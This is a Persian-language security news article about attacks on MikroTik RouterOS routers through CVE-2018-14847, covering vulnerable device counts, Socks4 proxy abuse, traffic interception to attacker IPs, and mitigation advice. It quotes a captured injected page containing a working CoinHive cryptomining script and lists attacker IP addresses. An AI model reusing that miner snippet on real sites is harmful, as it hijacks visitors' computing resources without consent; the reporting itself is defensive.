آشنایی با روترهای میکروتیک وروشهای مقابله با دستگاه های شنود

بررسی کلی
شرکت لتونیایی میکروتیک (MikroTik)، در سال ۱۹۹۶ برای توسعه روترها و سیستم‌های بی‌سیم ISP تأسیس شد. میکروتیک هم‌اکنون در سرتاسر جهان، سخت‌افزار و نرم‌افزار اتصال به اینترنت عرضه می‌کند. در سال ۱۹۹۷، میکروتیک سیستم نرم‌افزاری RouterOS را خلق کرد. در سال ۲۰۰۲، میکروتیک تصمیم گرفت سخت‌افزار اختصاصی خود را بسازد و برند RouterBOARD را ایجاد کرد. هر دستگاه RouterBOARD، از سیستم نرم‌افزاری RouterOS بهره می‌برد.

بنابر اسناد Vault7 که WikiLeaks منتشر کرده است، ابزار هک CIA، شیمِی قرمز (Chimay Red)، از دو حفره امنیتی در (Winbox (CVE-2018-14847 و Webfig استفاده می‌کند.

Winbox و Webfig هردو از اجزای مدیریتی RouterOS اند. Winbox یک نرم‌افزار مبتنی بر ویندوز و دارای رابط گرافیکی (GUI) است؛ در حالی که Webfig مبتنی بر وب عمل می‎‌کند. پورت‌‌های مشترک این دو نرم‌افزار TCP/8291، TCP/80 و TCP/8080 هستند.

سیستم‌های هانی‌پات، طعمه‌هایی برای شناسایی و انحراف حملات سایبری و خنثی‌سازی دسترسی‌های غیرمجاز هستند. از اواسط جولای (تیر)، سیستم هانی‌پات انگلرفیش (Anglerfish Honeypot System)، بدافزاری را که از نفوذپذیری CVE-2018-14847 استفاده می‌کرد تا فعالیت‌های مخرب گسترده‌ای را اجرا کند، شناسایی کرد. محققین امنیت برخی دیگر از این قبیل فعالیت‌ها مثل تزریق کد استخراج ارز دیجیتال به روش کوین‌هایو (CoinHive) را ردیابی کرده‌ بودند.

همچنین تعداد زیادی از افراد مشاهده شده‌اند که پروکسی ساکس۴ (Socks4) بر روی دستگاهشان توسط عاملی مشکوک فعال شده‌ است.

جالب‌تر آنکه ترافیک بیش از ۷۵۰۰ نفر به آی‌پی‌هایی که توسط مهاجمان ناشناس کنترل می‌شوند، ارسال می‌شود و بدین ترتیب این افراد شنود می‌شوند.

دستگاه‌های آسیب‌پذیر
از بین ۵ میلیون دستگاه ثبت‌شده با پورت TCP/8291 باز، ۱۲۰۰۰۰۰ (یک میلیون و دویست هزار) دستگاه متعلق به میکروتیک هستند که از این بین، ۳۷۰۰۰۰ (سیصد و هفتاد هزار) دستگاه (۳۰.۸۳%) به CVE-2018-14847، آسیب‌پذیرند.

برزیل ۴۲۳۷۶
روسیه ۴۰۷۴۲
اندونزی ۲۲۴۴۱
هند ۲۱۸۳۷
ایران ۱۹۳۳۱
ایتالیا ۱۶۵۴۳
لهستان ۱۴۳۵۷
ایالات متحده ۱۴۰۰۷
تایلند ۱۲۸۹۸
اوکراین ۱۲۷۲۰
چین ۱۱۱۲۴
اسپانیا ۱۰۸۴۲
آفریقای جنوبی ۸۷۵۸
جمهوری چک ۸۶۲۱
آرژانتین ۶۸۶۹
کلمبیا ۶۴۷۴
کامبوج ۶۱۳۴
بنگلادش ۵۵۱۲
اکوادور ۴۸۵۷
مجارستان ۴۱۶۲
بیشترین دستگاه‌های آسیب‌پذیر به تفکیک کشور

حملات
تزریق کد استخراج ارز دیجیتال به روش CoinHive
بعد از فعال‌سازی پروکسی HTTP در RouterOS، مهاجم از حقه‌ای استفاده کرده و تمامی درخواست‌های پروکسی HTTP را به یک صفحه‌ی لوکال ارور ۴۰۳ هدایت می‌کند. در این صفحه‌ی ارور، لینکی از coinhive.com برای استخراج (mining) ارز دیجیتال درج شده است. با این کار مهاجم امیدوار است تا بر روی تمامی ترافیک پروکسی دستگاه کاربر، استخراج انجام دهد.

نکته قابل توجه این است که کد ماینینگ به این صورت عمل نمی‌کند. تمامی منابع خارجی وب، از جمله منابع coinhive.com که برای استخراج ارز دیجیتال مورد نیاز است، توسط (ACL (Access Control Listهای پروکسی که توسط خود مهاجمان تعبیه شده‌، مسدود می‌شود.

# curl -i --proxy http://192.168.40.147:8080 http://netlab.360.com
HTTP/1.0 403 Forbidden
Content-Length: 418
Content-Type: text/html
Date: Sat, 26 Aug 2017 03:53:43 GMT
Expires: Sat, 26 Aug 2017 03:53:43 GMT
Server: Mikrotik HttpProxy
Proxy-Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<title>"http://netlab.360.com/"</title>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('hsFAjjijTyibpVjCmfJzlfWH3hFqWVT3', {throttle: 0.2});
miner.start();
</script>
</head>
<frameset>
<frame src="http://netlab.360.com/"></frame>
</frameset>
</html>

پروکسی ساکس ۴ و 95.154.216.128/25 اسرارآمیز
در حال حاضر، پروکسی ساکس ۴ بر روی ۲۳۹ هزار دستگاه به‌طور مشکوکی فعال است. ساکس ۴ معمولاً از پورت TCP/4153 استفاده می‌کند. تنظیمات پروکسی ساکس ۴ فقط اجازه اتصال از آی‌پی‌های 95.154.216.128/25 را می‌دهد. مهاجمان برای به‌دست‌آوردن مجدد کنترل بعد از ریبوت دستگاه (تغییر آی‌پی)، دستگاه را طوری تنظیم می‌کنند تا به‌طور زمان‌بندی‌شده آخرین آی‌پی را با اتصال به آدرس (URL) مخصوص مهاجم گزارش کند.

همچنین مهاجم با استفاده از این پروکسی ساکس۴ آسیب‌پذیر، به‌دنبال دستگاه‌های RouterOS بیشتری می‌گردد.

هم‌اکنون، تمامی ۲۳۹ هزار دستگاه فقط اجازه دسترسی از 95.154.216.128/25 (غالباً 95.154.216.167) را می‌دهند. پی بردن به قصد مهاجمان از این تعداد پروکسی‌ ساکس ۴ دشوار است.

 شنود

دستگاه‌های RouterOS به کاربران اجازه می‌دهد تا بسته‌‌های (Packet) روتر را گرفته و این ترافیک را به یک سرور خاص ارسال کنند. مهاجمان، ترافیک ۷.۵ هزار دستگاه RouterOS را به یک سری IPهای جمع‌کننده ارسال می‌کنند. در بین این آی‌پی‌ها، 37.1.207.114 نقش پررنگ‌تری داشته و ترافیک قابل توجهی از دستگاه‌ها به این مقصد ارسال می‌شود.

مهاجمان بیشتر به پورت‌های ۲۰، ۲۱، ۲۵، ۱۱۰ و ۱۴۳ علاقه دارند. این پورت ها به FTP، SMTP، POP3 و IMAP مربوط اند. همچنین پورت‌های ۱۶۱ و ۱۶۲، که مربوط به SNMP هستند، جزو پورت‌های محبوب مهاجمان محسوب می‌شوند. سوالی که پیش می‌آید این است که چرا مهاجمان پروتکل SNMP را، که به ندرت توسط کاربران استفاده می‌شود، مورد هدف قرار داده‌اند؟ آیا آن‌ها قصد شنود اطلاعات از کاربران خاصی ‌را دارند؟ هنوز پاسخ این سوال معلوم نیست.

آی‌پی جمع‌کننده تعداد دستگاه‌ها
37.1.207.114 ۴۲۳۷۶
185.69.155.23 ۴۰۷۴۲
188.127.251.61 ۲۲۴۴۱
5.9.183.69 ۲۱۸۳۷
77.222.54.45 ۱۹۳۳۱
103.193.137.211 ۱۶۵۴۳
24.255.37.1 ۱۴۳۵۷
45.76.88.43 ۱۴۰۰۷
206.255.37.1 ۱۲۸۹۸
برترین مهاجمان

پورت تعداد دستگاه‌ها
۲۱ ۵۸۳۷
۱۴۳ ۵۸۳۲
۱۱۰ ۵۷۸۴
۲۰ ۴۱۶۵
۲۵ ۲۸۵۰
۲۳ ۱۳۲۸
۱۵۰۰ ۱۱۱۸
۸۰۸۳ ۱۰۹۵
۳۳۳۳ ۹۹۳
۵۰۰۰۱ ۹۸۴
۸۵۴۵ ۹۸۲
۱۶۱ ۶۷۷
۱۶۲ ۶۷۳
۳۳۰۶ ۳۵۵
۸۰ ۲۸۲
۸۰۸۰ ۲۴۳
۸۰۸۱ ۲۳۷
۸۰۸۲ ۲۳۰
۵۳ ۱۶۸
۲۰۴۸ ۱۶۷
پورت‌های شنود شده

کشور تعداد IPها
روسیه ۱۶۲۸
ایران ۶۳۷
برزیل ۶۱۵
هند ۵۹۴
اوکراین ۵۴۴
بنگلادش ۳۷۵
اندونزی ۳۶۴
اکوادور ۲۱۸
ایالات متحده ۱۹۱
آرژانتین ۱۸۹
کلمبیا ۱۲۲
لهستان ۱۱۳
کنیا ۱۰۶
عراق ۱۰۰
اتریش ۹۲
اقیانوسیه ۹۲
بلغارستان ۸۵
اسپانیا ۸۴
ایتالیا ۶۹
آفریقای جنوبی ۶۳
جمهوری چک ۶۲
صربستان ۵۹
آلمان ۵۶
آلبانی ۵۲
نیجریه ۵۰
چین ۴۷
هلند ۳۹
ترکیه ۳۸
کامبوج ۳۷
پاکستان ۳۲
انگلستان ۳۰
اتحادیه اروپا ۲۹
آمریکای لاتین ۲۶
شیلی ۲۵
مکزیک ۲۴
مجارستان ۲۲
نیکاراگوئه ۲۰
رومانی ۱۹
تایلند ۱۸
پاراگوئه ۱۶
تعداد قربانیان به تفکیک کشور

پیش‌گیری و مقابله
پیشنهاد می‌شود که کاربران RouterOS سیستم نرم‌افزاری خود را به‌طور منظم به‌روزرسانی کنند. همچنین بررسی کنند که پروکسی HTTP، پروکسی ساکس ۴ و ترافیک شبکه، مورد سوءاستفاده قرار نمی‌گیرد.

از میکروتیک انتظار می‌رود تا عدم اجازه دسترسی ورودی از اینترنت به Webfig و Winbox و بهبود سازوکار به‌روزرسانی‌های امنیتی را در دستور کار خود قرار دهد.

اطلاعات مهاجمان
نام IP
AS50673 Serverius Holding B.V. 37.1.207.114
AS200000 Hosting Ukraine LTD 185.69.155.23
AS56694 Telecommunication Systems, LLC 188.127.251.61
AS24940 Hetzner Online GmbH 5.9.183.69
AS44112 SpaceWeb Ltd 77.222.54.45
AS22773 Cox Communications Inc. 24.255.37.1
AS20473 Choopa, LLC 45.76.88.43
AS53508 Cablelynx 206.255.37.1
AS20860 iomart Cloud Services Limited. 95.154.216.167
لیست مهاجمان

با توجه به حضور قابل توجه IPهای ایرانی در میان دستگاه‌های آسیب‌پذیر و شنودشده پیشنهاد می‌کنیم اگر از دستگاه‌های میکروتیک مجهز به RouterOS استفاده می‌کنید، هرچه سریع‌تر موارد اشاره‌شده در بخش پیش‌گیری و مقابله را بررسی کنید.

نظر شما در این رابطه چیست؟ آیا شما از دستگاه‌های میکروتیک استفاده می‌کنید؟ به نظر شما چه کسانی و با چه اهدافی در پشت این حملات هستند؟ دیدگاه‌های خود را با ما در میان بگذارید.

منبع : زومیت